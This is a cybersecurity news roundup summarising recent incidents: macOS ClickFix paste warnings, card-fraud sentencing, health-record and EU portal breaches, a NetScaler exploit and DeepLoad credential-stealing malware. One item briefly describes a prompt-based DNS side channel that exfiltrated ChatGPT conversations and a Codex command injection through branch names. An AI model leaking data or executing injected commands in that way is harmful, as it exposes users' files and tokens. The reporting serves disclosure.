In today’s cybersecurity news…
macOS Terminal gets ClickFix attacks
Apple added a new macOS Tahoe 26.4 security feature that warns users and delays execution when pasting potentially dangerous commands into Terminal, targeting “ClickFix” social engineering attacks that trick users into running malicious code. The system alerts users that execution was blocked and explains the risks, though they can still proceed. The feature isn’t fully documented and may not trigger consistently, so users are still advised not to run unfamiliar commands, as attackers continue to exploit user-initiated actions to bypass traditional protections. (BleepingComputer)
Russian court sentences ‘Flint’ over card fraud
A Russian military court sentenced 26 members of the Flint24 cybercrime group, including alleged leader Alexei Stroganov, to up to 15 years in prison for running a large-scale payment card fraud operation. Authorities said the group sold stolen card data through dozens of online shops, enabling global fraud that targeted victims across Russia, the EU, and the U.S. U.S. investigators have also charged Stroganov in a separate case involving the theft of hundreds of millions of card records and more than $35 million in losses, though extradition is unlikely. (The Record)
CareCloud probes data breach
CareCloud disclosed a cybersecurity incident that disrupted one of its electronic health record environments for about eight hours and may have exposed patient data. The company said the breach was limited to its CareCloud Health platform, with no impact on other systems, and all affected services have since been restored. An investigation is ongoing to determine whether data was accessed or exfiltrated, and while no threat actor has claimed responsibility, the company reported the incident due to the sensitivity of the data and potential regulatory and reputational risks. (SecurityWeek)
Citrix NetScaler bug exploited
A critical Citrix NetScaler flaw is already being actively exploited days after disclosure, with researchers at watchTowr observing attackers scanning and targeting vulnerable systems. The bug allows memory overread attacks that can expose sensitive data like session tokens and credentials, and may actually consist of multiple related vulnerabilities. Security agencies warn NetScaler devices are high-value targets because they sit in authentication paths, leaving organizations rushing to patch as attackers move quickly to extract data from exposed systems. (The Register)
Huge thanks to our sponsor, ThreatLocker
EC downplays ShinyHunters impact
The European Commission said a cyberattack on its Europa.eu web portal was contained quickly and did not impact internal systems, despite claims by ShinyHunters that it stole more than 350GB of data. Officials acknowledged limited impact to public-facing sites, noting the data may already be publicly available, and said defenses detected and mitigated the intrusion without service disruption. An investigation is ongoing to determine what data was accessed. (The Record)
OpenAI patches ChatGPT flaw over DNS data
Check Point researchers disclosed a ChatGPT vulnerability that allowed data exfiltration via a malicious prompt exploiting a hidden DNS-based side channel in its Linux runtime, potentially leaking conversations and files without user awareness. The flaw bypassed built-in safeguards, enabling covert data transfer and remote command execution. OpenAI patched it on February 20th and said there’s no evidence of real-world exploitation. Separately, BeyondTrust Phantom Labs found a command injection bug in OpenAI Codex that let attackers abuse GitHub branch names to execute code and steal access tokens, enabling full repository access. OpenAI fixed that issue on February 5th. (The Hacker News)
Manufacturing and healthcare share password struggles
Manufacturing and healthcare are top ransomware targets due to weak password practices, with research from Black Kite showing manufacturing as the most targeted sector for four consecutive years. Experts say both industries rely on legacy systems and prioritize uptime, leading to risky behaviors like shared credentials, weak passwords, or no authentication at all, which attackers exploit for initial access. (Dark Reading)
DeepLoad to use AI for persistent evasion
Researchers at ReliaQuest uncovered a credential-stealing campaign called “DeepLoad” that uses AI-generated obfuscation and social engineering to gain persistent access, often triggered by fake browser prompts. The malware logs keystrokes, hides malicious code under massive volumes of AI-generated junk code, runs under trusted Windows processes, and can reinfect systems days later via USB spread and hidden persistence mechanisms. AI-driven attacks like this are increasingly eroding traditional signature-based defenses, pushing organizations toward behavioral and runtime detection. (CyberScoop)